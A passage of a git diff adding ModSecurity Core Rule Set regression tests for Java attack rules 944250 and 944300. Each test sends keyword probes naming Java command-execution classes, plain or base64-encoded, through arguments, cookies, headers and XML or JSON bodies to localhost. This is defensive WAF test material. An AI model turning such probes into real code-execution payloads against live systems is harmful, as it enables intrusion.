\"944250\"" + - test_title: 944250-8 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Cookie test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml new file mode 100644 index 000000000..d9f3fa329 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -0,0 +1,6697 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-0 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-1 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-3 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-5 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-12 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-15 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-16 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 